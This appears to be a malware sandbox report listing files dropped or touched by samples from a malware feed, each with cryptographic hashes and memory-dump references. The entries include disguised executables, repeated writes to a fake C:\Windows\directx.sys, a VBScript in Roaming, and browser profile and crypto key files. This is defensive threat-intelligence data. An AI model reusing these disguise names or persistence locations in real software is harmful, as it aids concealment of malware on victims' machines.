SHA512 f8f149c9eab06e8d7e1aa62145f0fc588dc36fc521ef4dceceb80a191b72d79586d920feb5f3b1d19595109cc6d608c143e32f521a4da1068c708a2538899ada

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e06d507cf62731c722a64d0a05920cae
SHA1 67803d473eb3ee95fd4fbffe86495439a3ad0788
SHA256 649d9059073d26194160e5509f34df679b9dda13d0e22f72f863d0e8b9e8f464
SHA512 750c1f7b63f1959361f46648567bd0b29efa1bd171a4103a3e02ab767a1604955557407416e324122ce55d49488d5413ed1ff8a045ff9aeb3e2c3e764cd312dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 52bd7d0dcf87dfac42296086b5263bbc
SHA1 7a3666cb971db3c9642b3e0465059e0d8b0dfca9
SHA256 041acdb1962831ac59ef9245abc435f9dfd218afc6b86292370b1157c6bcadad
SHA512 7ac372491f30c10a2eeb59fe0e4d52dbfe315c44cf1ca87b48666ff889b1bf4a493bfbf2a35568f53ff49112c2051a0d9b13321908f267626c3138d166592269

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 2adecae5a2ec5bc8afccae185ae243cb
SHA1 21fc065b9658f595338d00ad2bc9d1ca8b29643c
SHA256 a38fc724d7bf336efbda296f05044df8d05c81a2ea14a1011cfd74c9c1498dd1
SHA512 33ff742cc8bef75c7cfcd2b454f26866fd12072c2137255217c3e74f8e956de3249b83233b0a4aa6c8088a8af9655d7faa94c92feeb4bc976616eeb3b6f2a16b

memory/1872-4536-0x00007FF738510000-0x00007FF73948B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\4bda0570-91f5-4e66-8883-da87302ba693.dmp

MD5 4d86b3600809fc56ac9e209f42efa353
SHA1 a527b318bf3f450c136f283ca09fb0c0a12382ad
SHA256 aff628f37128c1100e5220ba418c37cca4bf94948d09abfa8a806f3d2e9e2bfd
SHA512 25d50069d66244ea30d00b4b1bf35ddfb937ac88d22bcad30c01268d3d22218f398e8298b013d94ddb8f1f1f75478762c6673987b852fc51a70b1e1ce4174906

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\92b954d5-085f-4dc3-9310-06394955115a.dmp

MD5 7669013fe2ef24442ff8df9be996c2b4
SHA1 59e3cfe4f0388bd00581d173555deb922f64bc14
SHA256 71926c4641ae377aa5af7d8d5ef9a889e965304b414af1aa2200b790b8d14e5e
SHA512 1d381ec5609ebcaaec2cb80eff91ab2024d8e74784565954faa6189e03d4aaf896d935fb0f073fbb51f72884cf5bf3285b0c480dccacf5d5e81d3ba011cbd2ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 70ca1e06305a4bd1d04d2e0c6da656da
SHA1 66cb45a6f47502852b8c06cdcb385419b5482e5f
SHA256 e5a00257bab85c8f30c4e75d58d20e12b18b39d967ee8e9e0ce87a1fb6a6b7d5
SHA512 ce8740a8ad9cf7314fb6f03c9bc8382b3528ebfafd1d5866bcfc252662fda2c72cab1db0c431bf78d6d3379e96e74d095e50c5eaf63d54d278f9a0e7cdf18423

memory/1932-4537-0x00000000070B0000-0x0000000007114000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\66509d49-61dc-4cb9-94d9-291fa570f819.dmp

MD5 db3cbdd13cfb0694137c1ef7ac6af221
SHA1 24001db53ea9e2aa9736182dca7fdc478a4c6449
SHA256 7e0ab0d6cbe268028ac493a5431db39355eb34bc1c8ab6870496ee5549232242
SHA512 0d04aab1e4bcc54e43840cb74871b9d1601f312fa077f83d4d6015def35f9f038b72f5733c49fd88e640269ad875555c6a1d7f53bf29a5e7efb9b8a437d3d3b8

memory/6824-4569-0x000000006E7C0000-0x000000006E80C000-memory.dmp

memory/6824-4579-0x0000000007170000-0x0000000007213000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\def.exe

MD5 9f875cd80ee26b55a71c2f795eb01c33
SHA1 e71f7e13477c83c59c50cb975c3d893dae12d2ff
SHA256 a599f8e501bc4a1a7f1ed10b05b5b6fe4c6f13c40c1065af952740880123bfb9
SHA512 811ab159ef2868b6458f53784e639020eff3411f5063d76497d91a519ed78976e139d9deb726aef6acf2c6cc06838abf302875905dc9d4c1ef4f5e8802602394

memory/7284-4607-0x0000000000390000-0x00000000007E0000-memory.dmp

memory/5880-4615-0x0000000000A30000-0x00000000016F8000-memory.dmp

memory/7284-4623-0x0000000000390000-0x00000000007E0000-memory.dmp

memory/7284-4624-0x0000000000390000-0x00000000007E0000-memory.dmp

memory/6824-4642-0x0000000006EE0000-0x0000000006EF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9QJA7.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f7344e66710b8bb099c433cfcfa38d44
SHA1 533f5f196146fa8b1939de38e9f637e81dc84297
SHA256 5a3070179de9a62c59f2d20ef9fce0bf2fd739e3e738d02c0d0396f2846c4262
SHA512 55110ecf79516be95eea876d44b9425154d8682aea5dcedd1e562842da2e961a64d6b8435a2f5101b907dd6bb36fe13b7faba032da9ab779f9f5a186f83d857c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2d8dbfbd8fc271aff177fd68a74cb667
SHA1 475b24a0ba1080d21f0c2c912c11f829bbea5d73
SHA256 95e163bed42d04a369244818d9abe9032e2ceacf683e1ca9ba27ae417ae53e3d
SHA512 f6f68f1f21c4a1ab71740041f74ce445ffa8a7ab8a6e095b4a04179ca6f4c8202b82d8e6c5c72853fe311a96caafd4251a374a1f8da014e16563b2597ef3e7cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 794620ec1e79ac9bc9a27ebbeecb08ac
SHA1 cf365eeeb64a25fe763ac078edfa5ab9c321d789
SHA256 b3356f0ddc460c6b00366420f51c6bb83c286362f073e7943a1271b4a2c3e58d
SHA512 613096da233853fd5116a0b94d2bcce62ae83900a23d3e64e4b0b9ad315a173eda178a288611e37c37d6b9e2a5af3af14b25c36c70eac78149846822fb3d012a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

MD5 a0030f44664a62c660262d93b2d18e60
SHA1 1f44000b2f95ae5353c9669192031a2b45f9fac8
SHA256 7fc48ecff357f37ad42e927118d2850c75772e23007fc7a385eacd592cf1dfe5
SHA512 2b155901139ddac15eab81ff00f49bb19a49233f6cb1b07f5da32946fad7f57c9812776be60813055da24ab32104a41273f06c6e8615ea6f760eedb79aa87260

memory/1076-4736-0x0000000000EA0000-0x0000000001333000-memory.dmp

memory/8876-4738-0x000000006E7C0000-0x000000006E80C000-memory.dmp

memory/7324-4748-0x000000006E7C0000-0x000000006E80C000-memory.dmp

memory/5420-4770-0x0000000000070000-0x000000000019E000-memory.dmp

memory/8052-4777-0x0000000000490000-0x00000000005BE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\4XYFk9r.exe

MD5 20c1c110a69ba6dc9fb55a1186334290
SHA1 7b35f156d8ef02936af990349d35efd7146380f2
SHA256 7d1850d00f469a99e922c4806ee971bb86b97e07ec585ef98536bed6db3b6c29
SHA512 08eb3ff63e09c6d236ceac3c006c844c48f283c266e8b3fa25ec1ee04d2eca49ec4788534e1ee55749de5ad89ddfa0dbbafa4eb9f30f35cdd783da08a2ad5d10

memory/7968-4800-0x000001FD32600000-0x000001FD32B98000-memory.dmp

memory/7968-4810-0x000001FD4D030000-0x000001FD4D0A6000-memory.dmp

memory/7968-4809-0x000001FD32FC0000-0x000001FD32FCA000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\4.exe

MD5 4cf7ec59209b42a0bc261c8cc4e70a48
SHA1 415ec9061883da4cadb5251519079dfe59e0924a
SHA256 2e5e8a0087e49de9ba8df196bc71e3ac0d6c2ca6095ac3ff91205bd9d8eaf678
SHA512 de28c9871740577f89902b6e65c3dd00889dfcfcb3ce83fad05070761d1dc9ce4fe85f92e8443f80cf4869956a4f558b60b509302d38b1bc53b5b3536936e7d8

C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe

MD5 6b84d200c817fd3956d0521f4ba0d1c5
SHA1 14c69b9b4b199c1f21b31ddbde3ce3141a25131d
SHA256 f0e0068b11df929aec7260f53bb5ddf84835a6524fe187724340f23ed09bb639
SHA512 c8f96c208624b348262755aeeb8c89c84aac09c14a5960f77f292110125cebc72685323508195e7c61d8f2c57feb9ed74af5c9a60847a229327c29db6cf8a049

memory/6600-4836-0x0000000000400000-0x000000000041C000-memory.dmp

memory/8052-4978-0x0000000000490000-0x00000000005BE000-memory.dmp

memory/9072-4976-0x0000000000490000-0x00000000005BE000-memory.dmp

memory/7284-4985-0x0000000000390000-0x00000000007E0000-memory.dmp

memory/7284-4965-0x0000000000390000-0x00000000007E0000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

MD5 64f01094081e5214edde9d6d75fca1b5
SHA1 d7364c6fb350843c004e18fc0bce468eaa64718f
SHA256 5861fcac5dcd75e856fb96a2f0563df56e321a4be2c420618763d0bf495700a0
SHA512 a7679967d985d006a3c6b000d32b5a258b3c489bddb303c98d9cc54fa597d8a410fa66980767fcf1defe682f7952f744fd3bace26e66244a2529dbddd7a35db0

memory/8480-5030-0x0000000000400000-0x000000000051A000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe

MD5 38dbe26818d84ca04295d639f179029c
SHA1 f24e9c792c35eb8d0c1c9f3896de5d86d2fd95ff
SHA256 9f94daaec163d60c74fff0f0294942525be7b5beaf26199da91e7be86224ceeb
SHA512 85c2261fdc84aee4e0bab9ebe72f8e7f0a53c22a1f2676de0c09628a3dbe6ebc9e206effd7a113a8e0e3fdb351656d0ebb87b799184591655778db0754e11163

C:\Users\Admin\Downloads\UrlHausFiles\666.exe

MD5 2664b1bbe0a0c9f7ead278b507836f8c
SHA1 f15b4a61a63e77604d33bd694430d579007403fd
SHA256 9d1c23ccb738f203000152d93334e6b84af277094a735b009e268dd95623b77c
SHA512 2c802f6307beee3cb8f5a3183e3ff7d8f52e8bea6f2e352bc189ac58dcc5eac8b3637ef331e0313bbb460dfcabba1448b6de1add9ac50cef86427407d311e3e5

memory/6776-5070-0x0000000000710000-0x0000000000720000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe

MD5 935cd858e1bfa763e24214f64e400a15
SHA1 f8d129e7288a9c41a0bd44521b253a6f708d9684
SHA256 c3c6e841f611923135474590c9c7c770a49f0c87c4e1850e13bb2b48ffdb5104
SHA512 4b8bd0aa1635f3f4e1d6b32119ef34bb4693ea083b08aae21b3c98c84057b9475f2d858f881641ec48618182822ca071d09110696dec229e82d586814f89b122

memory/5148-5094-0x0000000000400000-0x0000000000425000-memory.dmp

memory/6600-5093-0x0000000000400000-0x000000000041C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

MD5 759dd13715bc424308f1d0032ac4b502
SHA1 03347c96c50c140192e8df70260d732bea301ebc
SHA256 d4c86776bcf1dc4ffd2f51538f3e342216314b76cdba2c2864193350654a9aca
SHA512 4197992f4b44ea45c91cb00c7308949560ae24d179e9a14ebc4efb27e1b20abae203b1c8756c211eb9aab9732a3fd04c824bd6bc92510c8de3caea3a8cfa8e55

memory/1872-5114-0x00007FF738510000-0x00007FF73948B000-memory.dmp

memory/8292-5123-0x0000000000BD0000-0x0000000000C54000-memory.dmp

memory/9072-5113-0x0000000000490000-0x00000000005BE000-memory.dmp

memory/8328-5137-0x00007FF78BE00000-0x00007FF78CD7B000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\FiddlerSetup.exe

MD5 7fd1119b5f29e4094228dabf57e65a9d
SHA1 1a4e248bfe07f8c65ce68b4f29013442be6ef7c7
SHA256 5c92f0738c290eac319d4ac3006b5725f1d2163fbfe68dbb2047e07920f4d5e8
SHA512 20d22e16f5c285bd6ffdf3620762c340ffb97cc51c5080717b87442f29a14271644351b082392d9fb2fd1ce40a1fe56a4e6592a290d67f5c587e8e9eb2f33787

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

MD5 18e771089d4e61a6493f87e27c66d04c
SHA1 61f1f37c2e164dcd8ed25533093c186499e1d5bb
SHA256 ddd29358003656b3ce2323ed8bf7b52b716aa883668716f39acc7b924b5236f3
SHA512 d4f86d985485a8db2c65a1c168f114c69eb471db70a526af1c9613f94e07f7e0db2a5ad52334ecf8814d3dc06be1b595b97052fa6eb9909f421e7b0599511d19

C:\Users\Admin\Downloads\UrlHausFiles\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe

MD5 d64f56b8bfbf8571b6808e8311b7f227
SHA1 644cf41119c460096d1167202be2bbfb9eecedaa
SHA256 87ab705e4421caf3238ff4dffe9203ef0a5b5cf934dffe7667548f67f32a375f
SHA512 ed58508ceb56977aa6f57bda48f003b910d6f50436a42374406906813aa5b0b4dca1e290ba116dd49a32fe551e324046d1589edc0c06079fd0a802d66e01b859

C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe

MD5 82b64218305483038e1babd088cff080
SHA1 03873279a0b4c83b9571b621759aad544ccd0082
SHA256 f0b3eb65317809e872894728639ac919bc27e5cab4c5e34f2480fe076e0d353f
SHA512 b83c8ddbcbc48b085acda7c39bb74b31a19f4a671fc863c339cb97a35a7921703b7553437013a89e169ec03c337c7f83ebcdb9bfed8bd71bf5a8edb40eed3e8a

C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe

MD5 0066f98970748d1173343ecb8efcb60f
SHA1 b849377f56b23bedd094b3069f645542f095b782
SHA256 fdec686409d94188a755f39cb793f93fd2f0b62e99bc13ea9a63e1f3dd78c8a1
SHA512 fd805eb1e9be1bebe114d3e069fd387e337b620b003425d824debf5426111f97138b2e654e467b41983685c634d485edfc8434ad6217197d1266925f5ede9b1a

C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe

MD5 54c804c8f597748ce17394624b6c08a4
SHA1 4afa779208e5fa47630a8c4a17107e54db2234f5
SHA256 6163a3302b0eb60ff371116b0e90de30df65493ac7192235d4495e43c4a41d4f
SHA512 17ef71946a361962fc1747d78b60bb481574fba96b079cc3f7b2f220fa36db506cecd3ef9729c84c4e20b9c04b50ec766431d5dce0e21b8f2a15037750003384

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

MD5 2609215bb4372a753e8c5938cf6001fb
SHA1 ef1d238564be30f6080e84170fd2115f93ee9560
SHA256 1490105c73976217f35fe31d65939d1d9711d370c61f3d7d892afbb07eaaec63
SHA512 3892f3e4188250ab0d3508dd9c1825fa6dfab4fc50b4bc858703123e5512071d710fd8431f94912e74eaa4ca29b40c0b1b97805a5432a07fc09c35a87e6b23d2

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 16b50170fda201194a611ca41219be7d
SHA1 2ddda36084918cf436271451b49519a2843f403f
SHA256 a542a2170abf4de0cd79baeb2e8f08deaf6fdeea40e9fc1ec15cbeb988e7900a
SHA512 f07ed33310acc5008cda9dbf3c50e420ad3f76ed11b28b93b2bb32d47ddbb64c97b906babaf6edf2680bea5b6f7456c7986a8610cee30b867d3a07c4430f79e0

C:\Windows\directx.sys

MD5 d55790b2e07037510a0a41e6b4f138e6
SHA1 b352aa18e31bcca13b90c89344f4b9e015a6ea27
SHA256 81d3d2013ab6ae4193d3de506f0b9c214b05f935ba15d19212931bbaef4be95b
SHA512 497c1c2acd3ea1dbdcf44e1d9f36632b85e08c8bf8bf3ec6694331526f6cf7fd44f90355c03b0210ed91f000e0a28bf21240ea24f88029590a861dea53667999

C:\Windows\directx.sys

MD5 ccf75b70dd02f10b6565738695343dec
SHA1 e92280dda7efb48dd7bdd0b4e937872c74d52449
SHA256 22321ebaf7b22b8bbbb0559465b2d29a91b8d3b5798bded323ac35a1d94359c3
SHA512 f35c1a1a3c4c460350e7915bb709fbb18c4949f25b216c733fc663860473720ae31db9cd405371d609d279ff0da5bb648a723b1c1bfd7fe8f0f6e981a53d6b29

C:\Windows\directx.sys

MD5 3811c92d236bf9ebfdddfc1dfdffda04
SHA1 033259537f0573d7a7fae7bba54d636b8224c7f1
SHA256 217c5524803d2e32e0c00d6234d3ce7413ef784f199a70506b66ccc5e119c815
SHA512 1ef21d568587df8b127cb9e085e938ad84313b8978705f782780ea0352342643f896966634c76eece224e4e5348e15de7049db7aa8188f8e07c86272d52b4295

C:\Windows\directx.sys

MD5 81ca3d8f26c9841692005cd52b41b237
SHA1 a1f2d403e5a123d080321f801316a09ed21a4b34
SHA256 c64c02240106d3b1224db46a3e7b59076d33e1c951410e7cf430d27a97b3bc59
SHA512 223a30c785489a1cfb5d7fdbd4fb7cc861b6265042adf64e9dd8afae516be017e9430d3afeac9db1a29132bcf65afd156be3eeb839f3ed776f8fe67243700b75

C:\Windows\directx.sys

MD5 b6cce93ac23c2792abaf61736a90b8a3
SHA1 8b9fa70a372ffc4759c6a3d1286d154249cc3673
SHA256 dcd7c9090129deccee588d6177bf5f3bcb2c5e748a574573d7680b3615b95e36
SHA512 2caf561fb7e2d4db7a377814abdadd34704fcf90ec7e15e83eae5710e8241a989a9ffaad13bec81028be6aedd192b4ee5cebfd2ad32f4d3fbea5c498c6563f1d

C:\Windows\directx.sys

MD5 9b3b3ecf93dec3134980e0eeb41ee3cd
SHA1 adccb132d750e2e50a31f6a92a36bc7d38acea01
SHA256 212016c7fdd3ee0e3c7d64f29af947c169bc89f89c5db7364ac3d740dd1e5de8
SHA512 88056833fe0f7aca5d86584d49ef57bebf4466bc0e3fb98ac34f2d027f2f0542c5339da72311dec8810307124d256095a2b7139c51e328afed58a0f8cc741ca0

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 93b8c1748d61cafe3a551571537b0cdb
SHA1 fc1630795863d50a7e507244a42c4174d03dcba4
SHA256 2a395cc7dc19acb6677c3d919dc2771198439f3fa2d2a15514ddd5cd35490129
SHA512 35c18192d09839bf60513ff659c5eee3456d8bbb2aa0403ac6fd3c302e5479ed9d4453cdb31058a49bb7d6ef62257b54c6637cbdf98517112b137b2631ad4542

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4d0a6514809750b77b7e837ebbf8c19c
SHA1 0958afe1d4f86c07bcdd3d66d827c408145bf2c1
SHA256 0a6a248e29e7337d68119f95211b31fe02aeeeca0ff66e7e8c085d81642bfad2
SHA512 7eb0a8a34d4d31b4767dc0a4d98bf32612442500ac124645c70270f075a9ac12283a9ae0c896334694ffbe405f95017ab88fafffa3ca9a8e6a2369bc0d0b8aad

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3495501434-311648039-2993076821-1000\0f5007522459c86e95ffcc62f32308f1_ccb8eda8-03c5-41b1-ae24-26e7c7115f30

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Q7112G09\download[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\3644.tmp.exe

MD5 e0a745edcc32cc7b0fe58794b0722fac
SHA1 fa87bf5087a2a013fda69721aa653d41bd57657e
SHA256 c9c8e138a0b3f6fde60740a7fba42e107daac399e5c99ec710309f88553efbb4
SHA512 9b8367d852915003f769698b34df0fd3ba900fb7385fefb0960088ff9f10b00ea101bb2c112cde9929e2ffb176fe2f99773876748fa35cc66b5fd3149ef2b2ef

C:\Windows\directx.sys

MD5 e0e18ffa960a128c2f301d428b040a56
SHA1 2ade112a022d2dab583aab56cdc4ec6731f7bdd1
SHA256 7b4c33e7103970bef1f90316e1d3efd320da9cf44f578110ced5e9d0b71e5956
SHA512 e5424e32b10f879ee0447fdc95de7285b7ae8632bc663a2f934e92eb7e3c996c4a05b51377cb0674261ae3be844d41e4e0987a5347dea6db461f7f5b389019c6

C:\Users\Admin\AppData\Roaming\CMD.vbs

MD5 238ec4d17050e1841e8e0171407c2260
SHA1 2c8c14b257641f1e1151c6303dabde01621314f2
SHA256 163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb
SHA512 3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 51f387013b5aaf41d159a9bbfdfc2609
SHA1 7aab38edd394f8725a2e0b80bcd5c46f3d9cf45a
SHA256 de4896503b2ee893f841a696ce4eba75f69a5d2345d88a583e5065aef6b8274d
SHA512 d523bdfabbed63e8375234e1e7fce54691de886a3d7ac3313b8b7c77d32f874a94907e0d0f9fe2c57e8bda8812ae1e7e376383bcbfa469d48822d22bcdb3e9a4

C:\Windows\directx.sys

MD5 58ecabacd10cb10527493d2125234b57
SHA1 9548d21a6d92cadc5ddf0875f62f98bc0818275b
SHA256 e316140d097f418102e1c4177f2026f1dd366b629a2e621f232e994a3bb0c5b4
SHA512 7535ed79e163b34c2867828bf9eff44ad18e43b66e60e94797d563e17f44fccdb6a4fd217eb1769c858a57af7d5b5bbad42bd5d18390d1e1465aae3864afa096

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d3adfc9ce19c37d8a96b1b2747c8cead
SHA1 c5dc7444d1dc62afce833a17c6c9401f21f8a1f2
SHA256 a9fa7f2a293777159ab91a2b0fcb68e32c88b53ed7732b26b0fb80cc72faab50
SHA512 d21a6c5673ee6902ecd434f1db35673e511888a7e950fe05c6ec67a4b57b1a40fba15afbe71dd20b16de2ef6a9a9d7a584535a6a03a6a64b8673c32feb9eda3b

C:\Windows\directx.sys

MD5 379da762af3c612a6f42b333b82a496b
SHA1 a04e26fcd5e847af3f65714019e58031dc9bd670
SHA256 a02d7e933f4c418a247c916f79e1babc49c5ab0c5605fe0485843b0ef26b54ad
SHA512 65b07be22dd32447834a462c59cd809a34491ec1afba2ea67c93687c774ca00273c2b25f463e6418041cca3493206b24e19732ab1f4c19e36d33314872125023

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f86d3912-f273-4834-b8ff-1bde0d891b6a.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f8e08e91cc906dbc013f8739ccb4dcbb
SHA1 dd039f3ca3c0339cedb043df827246d8bfc79448
SHA256 a372fb94e10d66e22d9c88c16a1834a9acbe5df0c1985a55ce4779cded0e35aa
SHA512 6f1186ac9d9ac8a2f24224fbf7b3c351f9e7ff9c1633d581bc18d91101784f8bfb32719e5146d063113572f71987f2eeb1d3eecc954f7a2b791520f7bb6fb7ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f93fe13e99ccb1332a894d5cbafac8b6
SHA1 64206e26f2ae56201ddd12173626852b2c0d747c
SHA256 0766a99f87ecbd871408c1f46290814ae4d91aa929910737a714b72e18b3633e
SHA512 9184fece8a96550b08937c21772a3cc0b1381d9988bc05e37d01ddb785ab38c0e3de5e22df0ffca5128ce3b73d42ff95312887578e48cfacd907da5b5262c0f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\pending_pings\d4d5e792-8543-4686-b086-0275f85c5f1b

MD5 b8b266c4c12b4a58e26d9d6642a86a6f
SHA1 eed1c52a8ebd1348f7b94dfd85f376d1383bac8d
SHA256 603928e650d33dcaa72372756c84f654a4e3e2f1f99b1240fe88964dc75ab9ac
SHA512 d95c015b0e836de8da97b693a283a8c2c4f4971df53b5fd436fe35a0a2db3e4a3b3fe932d82fa1dd2b862cea959bc2c21ed97d74c2b70a3585ed38619251fb22

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\prefs.js

MD5 f109c63a059d7a1189e0935583833494
SHA1 0998d819e7a52a7e0a6c7063f5c4c78dc5e5a10a
SHA256 256c2c4edb76d662410e2da7bdb904000429e939c83e624556711cee01ae4766
SHA512 935a4efab49c3f7654db8f90fe11e4060b89ff7b9d6ebb6b9442a41fed0f0a274db38d1b01de7ee5db3947fbae01a4505794b1ccd1ecd5b3ba37479070bb102d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\db\data.safe.tmp

MD5 a9c67441dc52a157043b7cd1ca0cb41e
SHA1 cf64f12913fe3130df1b07dee5efe457ceecb2bc
SHA256 085a731ee4f0627164e965043d3efcebe6fc2a1ee7b3a94d2c5ddc314df288ae
SHA512 ff29055f318339176dcf91ad9b8de43d11123975c11a7e45b784cc4ca6bb8e45adb93556e25550baba5ed69ebf4eb482ffdd38455dfdf9becef86281d8d9e7e0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\pending_pings\571b09fd-8f18-476e-b6f5-d3cfd35bd843

MD5 0eb8454ce2bcb3777041d9f045aed299
SHA1 bb71fb632a03f77ac596640600f78540e94da174
SHA256 cb3fea8f1d841d4fc12fa8f27aa67da192895f8bf75a9c80efec3b094f71db11
SHA512 d2de9dc3720bedb29d7a2af1e861964a85e8d41e5dd9b95c4b16668ae752dc301126ee549263445069a8b97cf37f630c1d310b8f07f50fd5929bb7eb18027da3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\datareporting\glean\pending_pings\45ff3742-2e1b-47d8-94bf-99029ebaf0da

MD5 2bbf349f8d191104a79623760d24acc4
SHA1 5e00f6516201f4607dcd3e733c6dca0a8df509f6
SHA256 91adb60126ab27ec6c5774734330dde40cf550208f5cec3e09703553a8ada110
SHA512 5859289df400fe042cd875609704217fc23dd2fbf0d4047f607a91f3eeb5b6a8b32f272a4d02d0f0719ce0cb9766a5abda24f514e845fe4fe707c6ea4f182704

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e2dtnzpu.default-release\prefs-1.js

MD5 cb7dfb1853de209d57263a8f78d82b04
SHA1 3b7ed75accbad777e6adf1bfa4b6644b17906216
SHA256 dbd24fecba36a65671950ee730a4d71dd558e5d015b1b950826366f5a01ff6ab
SHA512 2fd3113f81da58e9b6d4d77f78a5ca145157599a31b30cca1691f519abe5dac6ca312a6e64722414e02c9a5c0d8d7d4836d0d2bf60a3e385957e544398d9f5ee

